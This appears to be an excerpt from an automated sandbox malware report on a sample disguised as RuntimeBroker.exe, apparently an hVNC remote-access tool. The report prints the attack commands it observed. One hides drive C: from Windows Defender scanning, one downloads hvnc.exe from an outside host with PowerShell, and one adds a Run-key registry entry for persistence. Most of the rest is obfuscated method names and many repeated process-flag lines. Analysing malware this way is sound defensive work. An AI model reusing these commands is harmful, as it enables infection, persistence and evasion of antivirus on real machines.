            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: RuntimeBroker.exe.10.dr Static PE information: 0xE4DEA2AC [Wed Sep 5 01:58:04 2091 UTC]
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Code function: 11_2_00007FF848F100BD pushad ; iretd 11_2_00007FF848F100C1
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Code function: 11_2_00007FF848F156EC push esp; iretd 11_2_00007FF848F156ED
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Code function: 11_2_00007FF848F14708 push ebp; retf 11_2_00007FF848F14758
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Code function: 11_2_00007FF848FD0644 pushfd ; retf 11_2_00007FF848FD065A
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe Code function: 11_2_00007FF848FD0CB0 pushfd ; retf 11_2_00007FF848FD0CEA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
            Source: RuntimeBroker.exe.10.dr Static PE information: section name: .text entropy: 7.994165630489083
            Source: RuntimeBroker.exe.11.dr Static PE information: section name: .text entropy: 7.994165630489083
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, BasicList.cs High entropy of concatenated method names: 'Reset', 'MoveNext', 'fWGSNCHRjxQ2T4Fywo0', 'fcUiKNHh63sdcETdT8P', 'RemoveLastWithMutate', 'Append', 'Trim', 'IndexOfString', 'IndexOfReference', 'IndexOf'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Lmg5B2r5iOTobXbK5P.cs High entropy of concatenated method names: 'bEHO6sR6a8', 'FWdOAmx6wkcOo3ZxZC7', 'IvAkvhxqpXLth8nM5QF', 'H6ld3Q3Ait', 'NsImFGHnIeCpxY9oEFi', 'NNnF6mHoct6qKkQ8tv0', 'NInM8IdOa', 'IZrVaKfOw', 'eFZcOjpdI', 'jStmZT3bg'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, EnumSerializer.cs High entropy of concatenated method names: 'VOC37tH1bDEEDetwHT8', 'Mesv5OHT0etgJekTYPo', 'GetTypeCode', 'EnumToWire', 'WireToEnum', 'Read', 'Write', 'EmitWrite', 'EmitRead', 'WriteEnumValue'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ListDecorator.cs High entropy of concatenated method names: 'CanPack', 'Create', 'EmitRead', 'EmitReadList', 'EmitReadAndAddItem', 'GetEnumeratorInfo', 'GetEnumeratorInfo', 'EmitWrite', 'Write', 'CanUsePackedPrefix'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TupleSerializer.cs High entropy of concatenated method names: 'HasCallbacks', 'EmitCallback', 'Callback', 'CreateInstance', 'GetValue', 'Read', 'Write', 'GetMemberType', 'CanCreateInstance', 'EmitWrite'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ImmutableCollectionDecorator.cs High entropy of concatenated method names: 'ResolveIReadOnlyCollection', 'CheckIsIReadOnlyCollectionExactly', 'IdentifyImmutable', 'Read', 'EmitRead', 'PEHOHZKOK63dgkM1IO7', 'FyvOy9KuLni6rABE9QQ', 'HsP38fKa2bO0ck2dnqc', 'TiME9oKdjETd5k0IA3g', 'WGEkHbKNxUWJXAMGXVj'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.cs High entropy of concatenated method names: 'HasCallbacks', 'CanCreateInstance', 'CreateInstance', 'Callback', 'GetMoreSpecificSerializer', 'Write', 'Read', 'InvokeCallback', 'CreateInstance', 'EmitWrite'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ArrayDecorator.cs High entropy of concatenated method names: 'CanUsePackedPrefix', 'CanUsePackedPrefix', 'EmitWrite', 'EmitWriteArrayLoop', 'Write', 'Read', 'EmitRead', 'jC9J9eFOA6svKL0Tiyu', 'TOpiW9Fuhxequy2NQZ7', 'aX3x8EFaSi22L5q8bo6'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, NullDecorator.cs High entropy of concatenated method names: 'EmitRead', 'EmitWrite', 'Read', 'Write', 'rrmgLfDXPoFVrbdRCu9', 'rMoJEGDWK2Oi98uAx34', 'pykRv5Dbi9slyZySH2Q', 'D2d9UaDLc7FLWw7fb9r', 'WNe09nDffwoYnXOQwW9', 'elW3cSDepGluf20nJa1'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, kN4mjkPjyVP9o3ItpY.cs High entropy of concatenated method names: 'Read', 'bN0mfnhX0Vct8p5KTvI', 'CUC2PlhLEuIfgWub6ip', 'rMETrFhfgBcAlves28k', 'CDEbu9hesUQEkQNvwZU', 'L3RUZ3huZLsAifY54QB', 'HA47ulhWKVfJJQMJ59v', 'V5W66ehbsY344RcbSJo'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Esqa5xAfgtSAA74hpW7.cs High entropy of concatenated method names: 'kfcAPjSxVP', 'owLABsml3f', 'rcLApseElL', 'PTdA8VNeUI', 'mxqA4CFMWP', 'hVTArvJ28l', 'HAuAEBtPt6', 'tNGAMdHj6K', 'e5wAV7cTsQ', 'm5SAcBB7w8'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.cs High entropy of concatenated method names: 'bxWaf46naSp4xHqT5r8', 'SOPIB86o8NUjLSWuvuy', 'pqENZChw7q', 'g38PJ8K3c0', 'okpNHR3UyF', 'vKrNjYP7oe', 'T0FN6Aerx4', 'nQVNqUdbj1', 'UAlonv9EFMm', 'Kavddwscrk'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Wfbie6o2QsljQ9VwRK9.cs High entropy of concatenated method names: 'OuodbUPYpG', 'PvdRLUH2WHVKfco5pSB', 'Wfg4RlHkTsDqtubROsK', 'jhyoN2s7cb', 'wfboAfOCNA', 'hJJoQRbX05', 'blXo7wZLnB', 'hIKoWNn1NQ', 'X1pobHsPWj', 'J0LoXoUAjx'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, wtmNqEOLToFd0OAR48g.cs High entropy of concatenated method names: 'XXuOldixYp', 'vZhOPyG5Gt', 't9YOiWCx1L', 'T0vOQmkdlB', 'nJTOeawnQD', 'sQROuSr3SW', 'EjGOa1np7o', 'Rc2OOaPWuT', 'MDgOdQ1kGA', 'XIYONW1Auu'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, QNPVv61TbvqMjbkf2F.cs High entropy of concatenated method names: 'vmn0NnEgE', 'ProcessorId', 'wcUGVc3bg', 'twPIvsvcp', 'JFSSYqM9J', 'YHBRTTymO', 'UCbyWchBb', 'EchhqqkNT', 'ToWgGtVPX', 'BXm947nYY'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, bF2BgwAmW4F4SupPVnt.cs High entropy of concatenated method names: 'ALXBz2oFGf', 'nIjpnf5hVZ', 'qu2potWvyE', 'vFap3Rw3eH', 'k44pCNHPwP', 'hFupw6bhoT', 'qAtpYcuvac', 'qfmAqpErCd', 'lMYp2cueo8', 'UuipkVUf2K'

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe File created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
